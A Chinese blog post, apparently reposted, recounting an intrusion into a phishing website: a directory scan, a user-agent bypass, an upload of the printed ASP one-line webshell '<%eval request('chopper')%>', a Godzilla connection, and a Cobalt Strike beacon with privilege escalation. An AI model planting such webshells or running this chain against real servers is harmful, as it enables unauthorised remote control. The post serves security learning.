[实战渗透]记某钓鱼网站渗透

admin 2022年12月26日00:47:01评论60 views字数 411阅读1分22秒阅读模式

一、信息合搜集

scandir信息收集

我们利用scandir 对钓鱼网站进行扫描

发现一个文件上传的入口,我们可以利用他进行上传webshell

[实战渗透]记某钓鱼网站渗透


二、哥斯拉webshell

绕UA信息

访问这个网站,发现这个小可爱骗骗还搞个个电脑访问

[实战渗透]记某钓鱼网站渗透

[实战渗透]记某钓鱼网站渗透

利用谷歌自带的工具 修改UA信息

[实战渗透]记某钓鱼网站渗透

可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。

[实战渗透]记某钓鱼网站渗透

[实战渗透]记某钓鱼网站渗透

三、文件上传webshell

编写一句话asp

一句话asp地址

访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马

<%eval request("chopper")%>

文件上传

重命名文件为 asp 后缀文件,然后,上传。

之后访问IP/xx.asp文件

哥斯拉

利用我们的哥斯拉进行连接

[实战渗透]记某钓鱼网站渗透

[实战渗透]记某钓鱼网站渗透

四、CS上线

[实战渗透]记某钓鱼网站渗透

哥斯拉那边运行一下

[实战渗透]记某钓鱼网站渗透

之后就可以像我这样上线提权了

[实战渗透]记某钓鱼网站渗透

本文作者:keyoldk, 转载请注明来自FreeBuf.COM


原文始发于微信公众号(白帽子程序员):[实战渗透]记某钓鱼网站渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月26日00:47:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [实战渗透]记某钓鱼网站渗透http://cn-sec.com/archives/1482172.html

发表评论

匿名网友 填写信息